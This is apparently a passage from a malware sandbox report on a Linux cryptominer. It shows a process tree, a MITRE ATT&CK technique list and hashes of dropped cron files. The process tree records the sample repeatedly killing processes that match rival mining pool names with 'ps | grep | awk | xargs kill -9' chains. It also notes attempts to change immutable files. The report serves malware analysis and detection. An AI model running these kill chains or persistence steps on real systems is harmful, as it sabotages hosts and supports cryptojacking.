  ps auxf
  2⤵
  - Reads CPU attributes
  PID:2496
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2505
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2504
- /bin/grep
  grep "[email protected]"
  2⤵
  PID:2503
- /bin/grep
  grep -v grep
  2⤵
  PID:2502
- /bin/ps
  ps auxf
  2⤵
  PID:2501
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2510
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2509
- /bin/grep
  grep monerohash.com
  2⤵
  PID:2508
- /bin/grep
  grep -v grep
  2⤵
  PID:2507
- /bin/ps
  ps auxf
  2⤵
  PID:2506
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2515
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2514
- /bin/grep
  grep /tmp/a7b104c270
  2⤵
  PID:2513
- /bin/grep
  grep -v grep
  2⤵
  PID:2512
- /bin/ps
  ps auxf
  2⤵
  - Reads runtime system information
  PID:2511
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2520
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2519
- /bin/grep
  grep xmr.crypto-pool.fr:6666
  2⤵
  PID:2518
- /bin/grep
  grep -v grep
  2⤵
  PID:2517
- /bin/ps
  ps auxf
  2⤵
  PID:2516
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2525
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2524
- /bin/grep
  grep xmr.crypto-pool.fr:7777
  2⤵
  PID:2523
- /bin/grep
  grep -v grep
  2⤵
  PID:2522
- /bin/ps
  ps auxf
  2⤵
  - Reads runtime system information
  PID:2521
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2530
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2529
- /bin/grep
  grep xmr.crypto-pool.fr:443
  2⤵
  PID:2528
- /bin/grep
  grep -v grep
  2⤵
  PID:2527
- /bin/ps
  ps auxf
  2⤵
  PID:2526
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2535
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2534
- /bin/grep
  grep stratum.f2pool.com:8888
  2⤵
  PID:2533
- /bin/grep
  grep -v grep
  2⤵
  PID:2532
- /bin/ps
  ps auxf
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:2531
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2540
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2539
- /bin/grep
  grep xmrpool.eu
  2⤵
  PID:2538
- /bin/grep
  grep -v grep
  2⤵
  PID:2537
- /bin/ps
  ps auxf
  2⤵
  PID:2536
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2544

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Cron

T1053.003

Persistence

Scheduled Task/Job

T1053

Cron

T1053.003

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Sudo and Sudo Caching

T1548.003

Scheduled Task/Job

T1053

Cron

T1053.003

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Sudo and Sudo Caching

T1548.003

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Disable or Modify Tools

T1562.001

Indicator Removal

T1070

Clear Linux or Mac System Logs

T1070.002

Credential Access

Discovery

Process Discovery

T1057

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/log_rot

Filesize
5B

MD5
727479ef7cedf30c03459bec7d87b0f0

SHA1
2082e7f715f058acab2398d25d135cf5f4c0ce41

SHA256
29872037c9573567744ef10ed2de57864ded7554c9fa2ef03fc1244c65794ba6

SHA512
4cb59d37f8481f9bb2745f494baa0910a68aad40ac2903ef1513547e091e1e772a5f9436f789ab91fcafb75b8a28c2112ede89004be41f33c01d936b542ca6ba

Download Submit
/var/spool/cron/crontabs/tmp.6yQXFM

Filesize
175B

MD5
a4e76b530ac3ae8a2dce5a53b4f05065

SHA1
f7e9ab673820d7cea2001d9820d15120b201ec2f

SHA256
01dbf477d7ca2bca3fd4b7fea5fc297141ac9ac9c64a615e9cf54f00b053eb2b

SHA512
902e4d3feb771f48e50c459c58480357a2f1d3b8a16c7d721e5fcf8a27337f427a91aa5cb5e93470f580d9abd36a5f03bab04f84d52f95563bfb479db9923010

Download Submit
/var/spool/cron/crontabs/tmp.MxsABL

Filesize
247B

MD5
a33691af6cde31bc2a6401c5ca441fc8

SHA1
125a30e406a943b48e8036ed19045ebfc64a1ef6

SHA256
8807f352000d44954aa685a3a8bf079ee393bf946a44fca14abea3487a7210d0

SHA512
208485fc4080d059b491e6ed44d48ba753ee4b006990131dd0cdc6fb302eeb6a99d707956d4d4072c81011470102420187aefdc49cad5e44a8718de23ceb48e6

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads